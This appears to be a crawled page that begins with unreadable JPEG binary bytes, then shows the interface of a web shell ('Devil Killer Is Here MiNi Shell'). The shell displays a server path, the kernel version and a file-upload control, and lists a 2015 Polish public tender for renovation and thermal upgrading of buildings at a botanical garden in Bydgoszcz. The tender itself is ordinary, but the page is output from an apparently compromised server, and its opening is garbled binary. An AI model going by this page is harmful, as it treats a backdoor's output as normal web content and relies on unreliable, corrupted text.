JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150903/130719-N-2015.html

<p class="kh_header"><b>Błonie: Prace remontowe pracowni nasiennej w budynku laboratoryjno-socjalnym oraz termomodernizacja budynku hydroforni w Ogrodzie Botanicznym  Krajowego Centrum Roślinnych Zasobów Genowych w Bydgoszczy, Instytutu Hodowli i Aklimatyzacji Roślin - Państwowego Instytutu Badawczego w Radzikowie.</b><br>
<b>Numer ogłoszenia: 130719 - 2015; data zamieszczenia: 03.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Hodowli i Aklimatyzacji Roślin , Radzików 1, 05-870 Błonie, woj. mazowieckie, tel. 22 7253611, faks 22 7254714.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ihar.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowy Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prace remontowe pracowni nasiennej w budynku laboratoryjno-socjalnym oraz termomodernizacja budynku hydroforni w Ogrodzie Botanicznym  Krajowego Centrum Roślinnych Zasobów Genowych w Bydgoszczy, Instytutu Hodowli i Aklimatyzacji Roślin - Państwowego Instytutu Badawczego w Radzikowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Wykonanie prac remontowych w pracowni nasiennej w budynku laboratoryjno-socjalnym oraz termomodernizacja budynku hydroforni w  Ogrodzie Botanicznym KCRZG w Bydgoszczy, Instytutu Hodowli i Aklimatyzacji Roślin - PIB w Radzikowie. 

Remontowany budynek, postawiony w latach 70. ubiegłego wieku, miał pełnić funkcje łącznika przyszklarniowego, jednak od samego początku został zaadoptowany do budynku mieszczącego zespół pomieszczeń laboratoryjnych, socjalnych i biurowych. Istniejący budynek laboratoryjno - socjalny jest budynkiem 2-kondygnacyjnym, podpiwniczonym, z dachem jednospadowym, wybudowanym w technologii tradycyjnej. Wyposażony jest we wszystkie instalacje potrzebne do funkcjonowania tego typu obiektu - instalację wodociągową i energetyczną, kanalizację sanitarną, instalację grzewczą z kotłowni, wentylację grawitacyjną oraz instalację odgromową.

Budynek hydroforni jest budynkiem parterowym, niepodpiwniczony, z dachem jednospadowym krytym papą, wybudowany w technologii tradycyjnej.

Zadania:

 A). Zad.III.1 - Remont pracowni nasiennej,  
           	       B). Zad. III.5 - Termomodernizacja budynku hydroforni,

Ad A). Prace remontowe pracowni nasiennej mają na celu:

1). Poprawienie stanu technicznego ścian wewnętrznych, podłóg i sufitów,
2). Poprawa walorów estetycznych i eksploatacyjnych pomieszczeń,
Powierzchnia użytkowa remontowanej pracowni nasiennej :

Pomieszczenie nr 1.1a		  8,99 m2
Pomieszczenie nr 1.1b		20,56 m2
Pomieszczenie nr 1.1c		  3,90 m2
Pomieszczenie nr 1.1d		33,36 m2
Łączna powierzchnia	                       66,81 m2

Opis rozwiązań materiałowych i zaleceń w zakresie:

 - tynków wewnętrznych,
 - malowania,
 - stolarki drzwiowej,
 - posadzki,
 - obudowy rur,
 - sufitu podwieszanego,
 
zawiera Opis prac remontowych dla zadania III.1 stanowiący -załącznik nr 9 z rysunkami:
9a_ Rys.1-Rzut piętra pom.1.2-inwentaryzacja,
9b_Rys.2-Rzut pietra pom. 1.1- projekt budowlany,

Szczegółowy zakres  robót, wymagania dotyczące sposobu wykonania oraz cechy techniczne i jakościowe dla robót stanowiących  przedmiot zadania III.1 zawiera:
1.	Specyfikacja Techniczna Wykonania i Odbioru Robót - załącznik nr 2; 
2.	Instalacje sanitarne/opis techniczny zad III.1- (załącznik nr 10);
10a_Rys.S1-Rzut I pietra Prac. Nasiennej- projekt budowlany,
10b_Rys.S2- Przekrój A-A i rozwinięcie,
3.	Instalacje elektryczne zad III.1-opis tech.-(załącznik nr 11);
11a_ Schemat zasilania tablica TN,
11b_ Rzut I piętra-Prac. Nasienna -Inst. Oświetl. i gniazd wtyczkowych,
11c_Rzut I pietra-Prac. Nasienna- WLZ i instalacje siłowe,
4.	Specyfikacja Techniczna Wykonania i Odbioru Robót-instalacje elektryczne wewnętrzne dla pomieszczeń nr: 1.1a, 1.1b, 1.1c, 1.1d - (załącznik nr 12;
5.	Przedmiary- załącznik nr 13;
13a_Przedmiar-Remont pracowni nasiennej- zad III.1,
13b_Przedmiar-W1 Instalacje elektryczne i teletechniczne -zad III.1,
13c_Przedmiar-W3 Instalacje elektryczne i teletechn.- zbiorcze zestawienie robocizny,
13d_Przedmiar-W4 Instalacje elektryczne i teletechn-zbiorcze zestawienie materiałów,
13e_Przedmiar-W5 Instalacje elektryczne i teletechn-zbiorcze zestawienie sprzętu,

Ad. B). Prace remontowe budynku hydroforni mają na celu:

  - poprawienie stanu technicznego ścian zewnętrznych,
 - dostosowanie izolacyjności  do wymagań obowiązującej normy,
 - oszczędności energii cieplnej zużywanej do ogrzania budynku,

Wysokość budynku wynosi 4,75 m, 5,35 m do ogniomurów w najwyższym punkcie.

Powierzchnia użytkowa budynku - 49,77 m2
Powierzchnia zabudowy -              67,97 m2

Opis rozwiązań materiałowych i zaleceń w zakresie:

 - docieplenia budynku hydroforni wraz z wykonaniem tynków,
 - docieplenia dachu,
 - wykonania ogniomurów,
 - zamontowania nowej rynny i okapu,
 - zamurowania 5 okien na elewacji tylnej,

 zawiera Projekt budowlany/opis techniczny   dla zadania III.5 stanowiący- załącznik nr 14 w tym rysunki:
_Rys.1A-Rzut, Rzut dachu, przekrój A-A inwentaryzacja,
_Rys.2A-Elewacje-inwentaryzacja,
_Rys.3A - Rzut przyziemia-Projekt budowlany,
_Rys.4A-Przekrój A-A-Projekt budowlany,
_Rys.5A-Rzut dachu-Projekt budowlany,
_Rys.6A-Elewacje-Projekt budowlany,

Szczegółowy zakres  robót, wymagania dotyczące sposobu wykonania oraz cechy techniczne i jakościowe dla robót stanowiących  przedmiot zadania III.5 zawiera:
1.	Specyfikacja Techniczna Wykonania i Odbioru Robót - załącznik nr 2; 
2.	Projekt sanitarny dla budynku hydroforni- załącznik nr 15
w tym _Rys.1-Rzut przyziemia,
3.	Przedmiar Ogólnobudowlany-Termomodernizacja Budynku Hydroforni-(załącznik nr 16);

Przy doborze materiałów należy kierować się wymaganiami sprecyzowanymi w ww. dokumentach. Odstępstwo od tych wymagań jest możliwe po uzyskaniu zgody Inwestora oraz inspektora nadzoru inwestorskiego.
Do wykonania robót należy użyć wyłącznie materiałów gwarantujących odpowiednią jakość, o parametrach technicznych  i jakościowych odpowiadających właściwościom materiałów przyjętych w projekcie i dopuszczonych do stosowania. Przy wykonywaniu robót budowlanych należy zastosować wyroby budowlane wprowadzone do obrotu zgodnie z zasadami określonymi  w ustawie z dnia 16 kwietnia 2004 r o wyrobach budowlanych oraz w przepisach wykonawczych do tej ustawy. Wykonawca ma obowiązek posiadać w stosunku do użytych materiałów i urządzeń dokumenty potwierdzające pozwolenie na zastosowanie w budownictwie (atesty, certyfikaty, aprobaty techniczne, świadectwa jakości). Roboty należy wykonywać zgodnie z zasadami sztuki budowlanej oraz obowiązującymi przepisami techniczno-budowlanymi.
Podczas realizacji robót Wykonawca umożliwi zamawiającemu kontrolę materiałów budowlanych, które będą użyte do wykonania przedmiotu zamówienia, w szczególności w zakresie ich jakości, posiadanych certyfikatów itp.

W celu oszacowania wartości zamówienia wykonawca przed przystąpieniem do przetargu winien bardzo dokładnie obejrzeć pomieszczenia. W tym celu należy kontaktować się z kierownikiem Ogrodu Botanicznego KCRZG w Bydgoszczy z dr. inż. Włodzimierzem Majtkowskim; pod numerem telefonu: 
508 374 348 lub dr inż. Janem Schmidtem tel; 52/ 381 31 93; tel kom; 694 664 265;

Po wykonaniu robót Wykonawca przedstawi Zamawiającemu szczegółową dokumentację powykonawczą określoną w STWiOR oraz dokumentację zawierającą wszelkie zmiany i odstępstwa od dokumentacji projektowej wniesione za zgodą inwestora, projektanta i inspektora nadzoru w trakcie realizacji robót.

Nazwy i kody - wg Wspólnego Słownika Zamówień Publicznych (CPV) 

Obiekt i temat zadania sklasyfikowano następująco : 
45211350-7 Budynki wielofunkcyjne 
Klasyfikacja robót: 
Dział : 45000000-7 Roboty budowlane 
Klasa : 45110000-1 Roboty w zakresie burzenia i rozbiórki obiektów budowlanych ; roboty ziemne 
Grupa : 45200000-9 Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii 
Klasa : 45210000-2 Roboty budowlane w zakresie budynków 
Klasa : 45220000-5 Roboty inżynieryjne i budowlane 
Grupa : 45300000-0 Roboty w zakresie instalacji budowlanych 
Klasa : 45320000-6 Roboty izolacyjne 
Grupa : 45400000-1 Roboty wykończeniowe w zakresie obiektów budowlanych 
Klasa : 45410000-4 Tynkowanie 
Klasa : 45420000-7 Roboty w zakresie zakładania stolarki budowlanej
Klasa : 45430000-0 Pokrywanie podłóg i ścian 
Klasa : 45440000-3 Roboty malarskie i szklarskie 
Klasa : 45450000-6 Roboty budowlane wykończeniowe , pozostałe 

§ 4. Termin wykonania zamówienia
1.	Roboty budowlane wchodzące w zakres prowadzonego postępowania muszą zostać wykonane w terminie: 60  dni kalendarzowych od daty zawarcia umowy. 
2.	Miejsce realizacji prac: Ogród Botaniczny Krajowego Centrum Roślinnych Zasobów Genowych w Bydgoszczy, ul. Jeździecka 5, 05-090 Bydgoszcz..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający  przewiduje udzielenie zamówień uzupełniających do wysokości 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.50-7, 45.00.00.00-7, 45.11.00.00-1, 45.20.00.00-9, 45.21.00.00-2, 45.22.00.00-5, 45.30.00.00-0, 45.32.00.00-6, 45.40.00.00-1, 45.41.00.00-4, 45.42.00.00-7, 45.43.00.00-0, 45.44.00.00-3, 45.45.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w wysokości: 4 000,00 zł (słownie: cztery tysiące złotych 00/100);</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie tego warunku uzna złożenie oświadczenia Wykonawcy ( art. 22 ust. 1  ustawy z 29 stycznia 2004 r. - Prawo zamówień Publicznych ( Dz. U. z 2013 r., poz. 907 z późn. zmianami).
Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postepowaniu na podstawie oświadczeń  lub dokumentów o których mowa w § 6.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli:

 -  w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postepowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie -  prawidłowo wykonali, zgodnie z zasadami sztuki budowlanej, co najmniej 2 zamówienia obejmujące:  remont budynków/pomieszczeń obejmujących  swoim zakresem  roboty ogólnobudowlane, sanitarne , elektryczne oraz roboty polegające na wykonaniu termomodernizacji budynku o wartości minimum brutto: 200 000,00 zł. łącznie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.  
Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postepowaniu na podstawie oświadczeń  lub dokumentów o których mowa w § 6.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił wymagań w tym zakresie. Zamawiający za spełnienie tego warunku uzna złożenie oświadczenia Wykonawcy ( art. 22 ust. 1  ustawy z 29 stycznia 2004 r. - Prawo zamówień Publicznych ( Dz. U. z 2013 r., poz. 907 z późn. zmianami). 
Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postepowaniu na podstawie oświadczeń  lub dokumentów o których mowa w § 6.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli  wykonawca dysponuje:

- kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, z min. 5 letnim doświadczeniem zawodowym jako kierownik budowy oraz będący członkiem właściwej Okręgowej Izby Inżynierów Budownictwa, posiadający aktualny wpis, aktualne ubezpieczenie od odpowiedzialności cywilnej. 
    
- kierownikiem  robót  elektrycznych  posiadającym  uprawnienia  budowlane  w  specjalności  instalacji  elektrycznych  z  min. 5  letnim  doświadczeniem zawodowym  jako  kierownik  budowy oraz będący członkiem właściwej Okręgowej Izby Inżynierów Budownictwa, posiadający aktualny wpis, aktualne ubezpieczenie od odpowiedzialności cywilnej.  

 - kierownikiem  robót  instalacji sanitarnych  posiadającym  uprawnienia  budowlane  w  specjalności  instalacji  sanitarnych  z  min. 5 letnim  doświadczeniem zawodowym  jako  kierownik  budowy oraz będący członkiem właściwej Okręgowej Izby Inżynierów Budownictwa, posiadający aktualny wpis, aktualne ubezpieczenie   od odpowiedzialności cywilnej.

   - Wykonawca musi zabezpieczyć niezbędną ilość pracowników przewidzianych do terminowej i zgodnej z umową realizacji zamówienia.

Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postepowaniu na podstawie oświadczeń  lub dokumentów o których mowa w § 6.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca:

 a). posiada środki finansowe lub zdolność kredytową w wysokości nie niższej niż 200 000,00 zł (słownie: dwieście tysięcy  złotych 00/100)
Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postepowaniu na podstawie oświadczeń  lub dokumentów o których mowa w § 6.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wykonawca zobowiązany jest złożyć w terminie składania ofert w formie określonej w niniejszej SIWZ:

a). Podpisany Formularz oferty - wg załącznika nr 1 do SIWZ;
b). Podpisane Kosztorysy ofertowe (Przedmiary robót) z cenami jednostkowymi i wartością robót, stanowiącą cenę zamówienia - Dla ZAD.III.1: (Załącznik nr 13a); załącznik nr 13b); załącznik nr13c); załącznik nr13d); załącznik nr 13e); Dla ZAD III.5: (załącznik nr 16);
c). podpisanego Formularza Oświadczenia Wykonawcy, zgodnego z art. 22 ust. 1 oraz ar. 24 ust 1, 2 i 2a ustawy Pzp - załącznik nr  3 do SIWZ,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
